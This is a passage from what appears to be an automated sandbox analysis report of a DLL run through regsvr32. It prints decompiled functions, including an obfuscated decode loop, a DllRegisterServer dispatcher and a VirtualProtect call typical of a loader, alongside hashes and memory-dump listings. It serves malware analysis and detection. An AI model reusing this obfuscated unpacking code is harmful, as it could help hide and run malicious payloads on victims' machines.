0x003cfeac
0x003cfeb3
0x003cfeba
0x003cfec1
0x003cfec5
0x003cfecc
0x003cfee2
0x003cfeec

APIs

ExitProcess.KERNEL32(00000000), ref: 003CFEEC

Strings

G]+, xrefs: 003CFE75

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: G]+
API String ID: 621844428-691902478
Opcode ID: e94481b05225a65ba98a4b16e923cea43d716156dc330be998a462f41dc0e36d
Instruction ID: 70e02acd7f132f48e1262d9b7ee42a2497e29439a9bcf310a368d30b11381552
Opcode Fuzzy Hash: e94481b05225a65ba98a4b16e923cea43d716156dc330be998a462f41dc0e36d
Instruction Fuzzy Hash: 17012570D01208FFDB08DFE9D94AA9DBBB4EF50304F60C088E415AB291D7B11B199F40

Uniqueness

Uniqueness Score: -1.00%

Function 10009A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10009A70() {
				intOrPtr _t1;
				intOrPtr _t2;

				_t1 =  *0x10092e80; // 0x2519a0
				if(_t1 == 0) {
					ExitProcess(0);
				}
				_t2 =  *0x10092e80; // 0x2519a0
				_push("DllRegisterServer");
				_push(_t2);
				 *((intOrPtr*)(E10001352()))(); // executed
				return 0;
			}

0x10009a70
0x10009a77
0x10009a7b
0x10009a7b
0x10009a81
0x10009a86
0x10009a8b
0x10009a94
0x10009a98

APIs

ExitProcess.KERNEL32 ref: 10009A7B

Strings

DllRegisterServer, xrefs: 10009A86

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: ff08c618fc2307561de42e64ce3814e91a6b9e4961b80d507465f56e090b0c40
Instruction ID: c8d850f207773afb1be7c42ce4aa9e800be504be1a3415e39b82b835044260e9
Opcode Fuzzy Hash: ff08c618fc2307561de42e64ce3814e91a6b9e4961b80d507465f56e090b0c40
Instruction Fuzzy Hash: 95D08075B0111357F704DFB4CCC5B463295F780641F050415F508C3114FB61E9004611

Uniqueness

Uniqueness Score: -1.00%

Function 10001730 Relevance: 3.3, APIs: 2, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E10001730() {
				signed int _t111;
				void* _t114;
				signed int _t123;
				signed int _t124;
				signed int _t140;
				signed int _t142;
				signed int _t166;
				signed int _t167;
				signed int _t185;
				signed int _t229;
				intOrPtr _t231;
				signed int _t233;
				signed int _t236;
				signed int _t237;
				signed int _t244;
				signed int _t245;
				signed int _t248;
				signed int _t258;
				signed int _t260;
				signed int _t263;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t277;
				signed int _t285;
				signed int _t298;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t316;
				signed int _t324;
				signed int _t335;
				void* _t353;
				void* _t354;

				_t263 =  *0x1008f21c; // 0x0
				 *((intOrPtr*)(_t353 + 0x14)) = 0;
				_t335 =  *((intOrPtr*)(_t353 + 0x14)) -  *((intOrPtr*)(_t353 + 0x2c)) +  *((intOrPtr*)(_t353 + 0x18));
				_t244 =  *0x1008f218; // 0x0
				_t111 =  *0x1008f224; // 0x0
				_t264 =  *0x1008f214; // 0x0
				 *(_t353 + 0x1c) = _t335;
				_t8 = _t111 + ((_t335 * _t263 * _t111 - _t244 * _t244 * _t263 * _t111) * _t111 - 3) *  *0x1008f228 + 0x1dd9; // 0x1dd9
				_t114 = malloc(_t264 * _t244 + _t8);
				_t304 =  *0x1008f220; // 0x0
				_t245 =  *0x1008f224; // 0x0
				 *((intOrPtr*)(_t353 + 0x14)) = 0;
				_t316 =  *0x1008f228; // 0x0
				 *(_t353 + 0x1c) = _t114;
				_t269 =  *0x1008f218; // 0x0
				_t354 = _t353 + 4;
				_t270 =  *0x1008f21c; // 0x0
				if(_t304 * _t245 - _t316 * _t245 - _t304 *  *0x1008f214 * _t316 - _t245 + _t269 + 0x9f3 + (_t304 * _t245 - _t316 * _t245 - _t304 *  *0x1008f214 * _t316 - _t245 + _t269 + 0x9f3) * 2 + (_t335 + 8) * _t270 > 0) {
					do {
						_t233 =  *0x1008f218; // 0x0
						_t324 =  *0x1008f214; // 0x0
						_t19 = _t245 + 1; // 0x1
						_t236 =  *(_t354 + 0x10);
						 *(((_t335 + 3) * _t304 * _t245 * _t245 - 0x10 + _t316 * 4) * _t316 + (_t245 + _t19 * _t270 + (_t324 - _t233) * 2) * 4 - (4 + _t304 * _t304 * 4) * _t304 + _t236 +  *((intOrPtr*)(_t354 + 0x30))) = _t236;
						_t258 =  *0x1008f214; // 0x0
						_t185 =  *0x1008f224; // 0x0
						_t260 =  *0x1008f220; // 0x0
						_t237 = _t236 + 1;
						 *(_t354 + 0x10) = _t237;
						 *((char*)(_t185 - (((_t258 *  *0x1008f21c * _t185 + 1) *  *0x1008f218 + 1) *  *0x1008f228 << 1) - _t335 *  *0x1008f220 - _t258 *  *0x1008f21c - _t258 *  *0x1008f21c - _t260 + _t185 +  *((intOrPtr*)(_t354 + 0x18)) + _t237 - 1)) =  *((intOrPtr*)(_t236 %  *(_t354 + 0x38) +  *((intOrPtr*)(_t354 + 0x34))));
						_t304 =  *0x1008f220; // 0x0
						_t316 =  *0x1008f228; // 0x0
						_t245 =  *0x1008f224; // 0x0
						_t298 =  *0x1008f218; // 0x0
						_t270 =  *0x1008f21c; // 0x0
					} while ( *(_t354 + 0x10) < _t304 * _t245 - _t316 * _t245 - _t304 *  *0x1008f214 * _t316 - _t245 + _t298 + 0x9f3 + (_t304 * _t245 - _t316 * _t245 - _t304 *  *0x1008f214 * _t316 - _t245 + _t298 + 0x9f3) * 2 + (_t335 + 8) * _t270);
				}
				 *(_t354 + 0x10) = 0;
				while(1) {
					_t123 =  *0x1008f218; // 0x0
					_t124 = _t123 * _t245;
					_t206 = _t316 - _t124;
					 *(_t354 + 0x38) = _t124;
					_t50 = _t206 - 2; // -2
					asm("cdq");
					_t140 =  *0x1008f214; // 0x0
					 *(_t354 + 0x14) = (0 +  *(_t354 + 0x14) +  *((char*)((2 - _t245 + _t245) *  *0x1008f214 +  *((intOrPtr*)(_t354 + 0x18)) + (_t316 - _t124 + _t50 - (_t335 + 1) * _t270) * _t304 +  *(_t354 + 0x10)))) % 0x1dd9;
					_t277 =  *0x1008f21c; // 0x0
					_t142 =  *0x1008f214; // 0x0
					_t74 = _t316 - 2; // -2
					_t77 = _t316 + 1; // 0x1
					_t229 =  *0x1008f214; // 0x0
					 *(_t354 + 0x38) =  *((intOrPtr*)((_t316 + _t74) * _t316 + ((_t316 + _t316 -  *((intOrPtr*)(_t354 + 0x2c)) +  *((intOrPtr*)(_t354 + 0x24)) +  *((intOrPtr*)(_t354 + 0x28))) * _t245 + _t277 * 2 - 2) *  *0x1008f218 +  *(_t354 + 0x38) + ((2 - _t245) * _t304 - _t140 * _t277 - _t142 + _t245) * 2 +  *(_t354 + 0x10) +  *((intOrPtr*)(_t354 + 0x30))));
					_t82 = _t229 + 1; // 0x1
					_t86 = _t277 + 2; // 0x2
					_t305 =  *(_t354 + 0x10);
					_t231 =  *((intOrPtr*)(_t354 + 0x30));
					 *((intOrPtr*)(_t354 + 0x34)) = (_t82 * _t277 + 2) *  *0x1008f218 + _t77 * _t277 - _t229 - _t316 + ((_t82 * _t277 + 2) *  *0x1008f218 + _t77 * _t277 - _t229 - _t316) * 2 - (_t245 * _t245 + _t86 + (_t245 * _t245 + _t86) * 2 + ( *(_t354 + 0x1c) + 2) * _t229) * _t245 +  *(_t354 + 0x14);
					_t335 =  *(_t354 + 0x1c);
					 *((char*)(_t316 * _t245 + _t305 + _t304 * _t304 - _t335 * _t316 + _t231)) =  *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x34)) + _t231));
					_t285 =  *0x1008f21c; // 0x0
					_t248 =  *0x1008f224; // 0x0
					_t166 =  *0x1008f214; // 0x0
					_t167 =  *0x1008f220; // 0x0
					_t306 = _t305 + 1;
					 *(_t354 + 0x10) = _t306;
					 *((char*)((_t167 + 1) *  *0x1008f218 + _t248 + (_t285 * _t248 * _t248 + _t166) * _t285 + ((_t167 + 1) *  *0x1008f218 + _t248 + (_t285 * _t248 * _t248 + _t166) * _t285) * 2 - (_t285 + _t335 + _t285 * 2 + 0x11) *  *0x1008f228 +  *(_t354 + 0x14) + _t231)) =  *(_t354 + 0x38);
					if(_t306 >= 0x1dd9) {
						break;
					}
					_t245 =  *0x1008f224; // 0x0
					_t316 =  *0x1008f228; // 0x0
					_t270 =  *0x1008f21c; // 0x0
					_t304 =  *0x1008f220; // 0x0
				}
				return  *0x10092e0c( *((intOrPtr*)(_t354 + 0x18)));
			}

0x100045d3
0x100045dd
0x100045e1
0x100045e4
0x100045f7
0x100045fc
0x10004613
0x10004620
0x10004628
0x1000462e
0x10004634
0x1000463c
0x10004647
0x1000464d
0x10004665
0x1000466d
0x10004677
0x10004687
0x1000468d
0x100046a2
0x100046ab
0x100046b3
0x100046bb
0x100046dc
0x100046df
0x100046f4
0x10004723
0x10004737
0x1000473b
0x1000473f
0x10004743
0x10004749
0x10004758
0x10004772
0x10004781
0x10004793
0x1000468d
0x1000479b
0x100047bd
0x100047bd
0x100047c4
0x100047c7
0x100047c9
0x100047cd
0x1000483d
0x10004843
0x10004863
0x10004867
0x1000487d
0x1000488a
0x10004896
0x100048ab
0x100048b1
0x100048b5
0x100048d5
0x100048f6
0x100048fc
0x10004900
0x10004904
0x1000491f
0x10004922
0x10004928
0x10004936
0x1000493d
0x1000496f
0x10004976
0x1000497a
0x1000497d
0x00000000
0x00000000
0x100047a5
0x100047ab
0x100047b1
0x100047b7
0x100047b7
0x10004998

APIs

malloc.MSVCRT ref: 10004628
??3@YAXPAX@Z.MSVCRT ref: 10004988

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ??3@malloc
String ID:
API String ID: 3530088491-0
Opcode ID: 5409cc403e25c39e311465a2e467b5a6dd9e8501f87bf5802bca3d19314ef469
Instruction ID: 2ad14cb6fdf66ba80742b192b25967e4aede6ac2992887dc8492ccd0cee2934b
Opcode Fuzzy Hash: 5409cc403e25c39e311465a2e467b5a6dd9e8501f87bf5802bca3d19314ef469
Instruction Fuzzy Hash: 92C1B03AB443168FD309CF6CDAC1955FBEABBC9200B05923FD544CB376DA70E9098A94

Uniqueness

Uniqueness Score: -1.00%

Function 003D4FB8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E003D4FB8(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t26;
				int _t33;
				void* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__ecx);
				E003C2528(_t26);
				_v32 = 0x1fdfe;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0xd7cabc;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xaf947812;
				_v12 = 0xfcfc14;
				_v12 = _v12 + 0xffffa733;
				_v12 = _v12 ^ 0x00f70671;
				_v8 = 0x27786a;
				_v8 = _v8 + 0xffff8bfa;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x6e53b40f;
				_v8 = _v8 ^ 0x6e7f6462;
				E003C6F64(0x3fc2ff72, __ecx, __ecx, 0xbfd2d08a, 0x8a);
				_t33 = CloseHandle(_t38); // executed
				return _t33;
			}

0x003d4fc0
0x003d4fc3
0x003d4fc6
0x003d4fc7
0x003d4fcc
0x003d4fdb
0x003d4fe1
0x003d4fe9
0x003d4fef
0x003d4ff6
0x003d4ffa
0x003d5001
0x003d5008
0x003d500f
0x003d5016
0x003d501d
0x003d5024
0x003d502b
0x003d5032
0x003d5042
0x003d504b
0x003d5052

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 003D504B

Strings

jx', xrefs: 003D5016

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: jx'
API String ID: 2962429428-4176335217
Opcode ID: 2e2e9e2accd36b75fff351e754f185f7a9df212b513db96fe7ee5bdbe3d2046e
Instruction ID: f21d9dcc9df1920a7990309156263f694b3c7d3bad9b7dac9be3c0a8a52faf4e
Opcode Fuzzy Hash: 2e2e9e2accd36b75fff351e754f185f7a9df212b513db96fe7ee5bdbe3d2046e
Instruction Fuzzy Hash: 53017570D01208FB9B04EBA8C90A99EBBB4EF00310F108188A900A6261E3B40F169F92

Uniqueness

Uniqueness Score: -1.00%

Function 1001FAA7 Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001FAA7(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x100967a8 = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E1001FB75() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x100967a8);
						goto L3;
					}
				}
			}

0x1001fab8
0x1001fac0
0x1001fac5
0x1001fadc
0x1001fade
0x1001fac7
0x1001face
0x1001fae1
0x1001fae2
0x1001fad0
0x1001fad6
0x00000000
0x1001fad6
0x1001face

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,1001A856,00000001), ref: 1001FAB8

Part of subcall function 1001FB75: HeapAlloc.KERNEL32(00000000,00000140,1001FACC), ref: 1001FB82

HeapDestroy.KERNEL32 ref: 1001FAD6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 09db9ee41486726115152a5ef6b63333e1e9af57dad65807013b0595602007f3
Instruction ID: ec24fe876f55e86d7b3ce24e77ae7f69b21765d3e3bb22f99a6f4ad24a1ea5dc
Opcode Fuzzy Hash: 09db9ee41486726115152a5ef6b63333e1e9af57dad65807013b0595602007f3
Instruction Fuzzy Hash: 00E01271214311AEFB449BB48C9977A75D5FB887C2F50543BF408C81A4EB74C9C0D601

Uniqueness

Uniqueness Score: -1.00%

Function 100076C0 Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E100076C0() {
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t120;
				signed int _t135;
				signed int _t146;
				signed int _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t173;
				signed int _t175;
				signed int _t196;
				signed int _t213;
				signed int _t225;
				signed int _t230;
				signed int _t233;
				signed int _t241;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				long _t251;
				signed int _t253;
				signed int _t255;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t297;
				signed int _t305;
				void* _t306;

				_t161 =  *(_t306 + 0x1c);
				_t98 = _t161[2];
				 *(_t306 + 0x14) = _t98;
				if(_t98 != 0) {
					_t154 =  *0x1008f228; // 0x0
					_t255 =  *0x1008f218; // 0x0
					_t99 =  *0x1008f21c; // 0x0
					_t241 = _t161[3];
					_t5 = _t154 + 1; // 0x1
					 *(_t306 + 0x10) = _t241;
					if((_t241 & _t99 - _t5 * _t255 - _t154 + 0x02000000) == 0) {
						_t269 =  *0x1008f224; // 0x0
						_t163 = _t269 * _t99;
						_t120 = _t269 *  *0x1008f220;
						 *(_t306 + 0x20) = _t120;
						 *(_t306 + 0x28) = _t163 * _t255 * _t154;
						_t32 = _t163 + 1; // 0x1
						_t270 =  *0x1008f220; // 0x0
						 *(_t306 + 0x1c) = _t163;
						_t247 =  *0x1008f214; // 0x0
						_t166 = _t255 * _t255 + _t270 * _t154 + _t99 + _t32 * _t269;
						_t35 = ((_t154 << 0x1e) - _t154) * 2; // 0x2
						_t38 = ( ~(_t255 * _t255 + _t270 * _t154 + _t99 + _t32 * _t269) << 0x1f) - _t166 + (_t120 * _t247 * _t99 * _t255 + _t35 + 2) * _t247 + 0x40000000; // 0x40000000
						_t173 =  *0x1008f220; // 0x0
						asm("sbb ebx, ebx");
						_t175 =  *0x1008f220; // 0x0
						_t248 =  *0x1008f224; // 0x0
						 *(_t306 + 0x18) =  ~( ~(( ~(_t255 * _t255 + _t270 * _t154 + _t99 + _t32 * _t269) << 0x0000001f) - _t166 + (_t120 * _t247 * _t99 * _t255 + _t35 + 0x00000002) * _t247 + _t38 &  *(_t306 + 0x10)));
						_t43 = ((_t175 * _t247 * _t247 << 0x1e) - _t175 * _t247 * _t247 + _t255 + ((_t173 + _t247 << 0x1e) - _t173 + _t247 + _t99) * _t154) * 4; // 0x20000008
						asm("sbb edx, edx");
						asm("sbb edx, edx");
						_t135 =  *0x1008f220; // 0x0
						 *(_t306 + 0x28) =  *(0x10092e60 + ( ~( ~(( ~(( *(_t306 + 0x28) + 1) * _t248 + _t99) << 0x0000001f) - ( *(_t306 + 0x28) + 0x00000001) * _t248 + _t99 + _t255 + ( ~(( *(_t306 + 0x28) + 1) * _t248 + _t99) << 0x0000001f) - ( *(_t306 + 0x28) + 0x00000001) * _t248 + _t99 + _t255 - 0x80000000 &  *(_t306 + 0x10))) + ( *(_t306 + 0x18) +  ~( ~((0x00000008 - ( *(_t306 + 0x28) << 0x00000002)) * _t248 + _t43 + 0x20000000 &  *(_t306 + 0x10))) * 2) * 2) * 4);
						_t196 =  *0x1008f214; // 0x0
						 *(_t306 + 0x18) = _t196 * _t99;
						_t62 = _t135 - 1; // -1
						if(( *(_t306 + 0x10) & _t62 * _t135 +  *(_t306 + 0x18) + (_t62 * _t135 +  *(_t306 + 0x18)) * 0x00000002 - ( *(_t306 + 0x1c) + 0x00000001) * _t154 + _t248 + _t255 + (( *(_t306 + 0x1c) + 0x00000001) * _t154 + _t248 + _t255) * 0x00000002 + 0x04000000) != 0) {
							_t70 = _t99 + 4; // 0x4
							_t225 =  *0x1008f220; // 0x0
							_t230 =  *0x1008f214; // 0x0
							 *(_t306 + 0x28) =  *(_t306 + 0x28) | _t230 + _t230 * 0x00000008 + ( *(_t306 + 0x18) +  *(_t306 + 0x18) * 0x00000002 - 0x00000003) * _t248 * _t248 * _t255 - _t225 * _t99 + _t255 + (_t248 * _t154 + _t70) * _t154 + (_t225 * _t99 + _t255 + (_t248 * _t154 + _t70) * _t154) * 0x00000002 + 0x00000200;
						}
						_t297 =  *0x1008f214; // 0x0
						_t213 =  *0x1008f220; // 0x0
						_t100 =  *0x1008f220; // 0x0
						_t102 = VirtualProtect( *( *(_t306 + 0x34)), (9 - _t99 + _t99 * 2) * _t248 - (_t213 + _t248 + _t297 + 4) * _t255 + _t154 + ((_t213 + _t248 + _t297 + 4) * _t255 + _t154) * 2 + (6 - _t154 + _t154 * 2) * _t297 + (3 - _t99 + _t99 * 2) * _t99 - _t100 + _t100 * 8 +  *(_t306 + 0x1c),  *(_t306 + 0x28), _t306 + 0x28 - ( *(_t306 + 0x20) << 3)); // executed
						asm("sbb eax, eax");
						return  ~( ~_t102);
					} else {
						_t249 =  *_t161;
						 *(_t306 + 0x18) = _t249;
						if(_t249 == _t161[1]) {
							_t233 =  *0x1008f214; // 0x0
							_t146 =  *0x1008f224; // 0x0
							_t251 =  *(_t306 + 0x28);
							if(_t161[4] != 0) {
								L8:
								_t235 = _t233 * _t154 + _t146;
								_t26 = _t235 * 2; // 0x4000
								 *((intOrPtr*)(_t251 + 0x20))( *(_t306 + 0x1c),  *(_t306 + 0x18), _t233 * _t154 + _t146 + _t26 + 0x4000,  *((intOrPtr*)(_t251 + 0x34)));
							} else {
								_t305 =  *(_t251 + 0x3c);
								if( *((intOrPtr*)( *_t251 + 0x38)) == _t305) {
									L7:
									_t251 =  *(_t306 + 0x28);
									goto L8;
								} else {
									_t253 =  *0x1008f220; // 0x0
									_t233 =  *0x1008f214; // 0x0
									_t264 =  *0x1008f220; // 0x0
									_t146 =  *0x1008f224; // 0x0
									if((_t146 * _t99 - _t253 * _t253 * _t154 + _t255 - 1) * _t99 +  *(_t306 + 0x14) % _t305 + _t233 * _t255 - _t253 * _t253 - _t146 == _t264) {
										goto L7;
									}
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}

0x100076c3
0x100076ca
0x100076d0
0x100076d4
0x100076e3
0x100076e9
0x100076ef
0x100076f4
0x100076f7
0x10007701
0x1000770f
0x100077c0
0x100077ca
0x100077cd
0x100077d6
0x100077e0
0x100077e4
0x100077ea
0x100077f0
0x100077fd
0x1000780c
0x10007821
0x1000782a
0x10007837
0x10007841
0x1000784c
0x1000785a
0x10007865
0x10007887
0x1000789a
0x100078c5
0x100078cc
0x100078d9
0x100078dd
0x100078e6
0x100078fb
0x10007918
0x10007921
0x10007925
0x10007942
0x10007963
0x10007963
0x10007979
0x10007980
0x100079be
0x100079d6
0x100079e0
0x100079e9
0x10007715
0x10007715
0x1000771c
0x10007720
0x10007729
0x1000772f
0x10007737
0x1000773b
0x10007792
0x10007798
0x1000779f
0x100077ad
0x1000773d
0x1000773d
0x10007745
0x1000778e
0x1000778e
0x00000000
0x10007747
0x10007747
0x1000776b
0x10007778
0x10007782
0x1000778c
0x00000000
0x00000000
0x1000778c
0x10007745
0x1000773b
0x100077bf
0x100077bf
0x100076d9
0x100076e2
0x100076e2

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
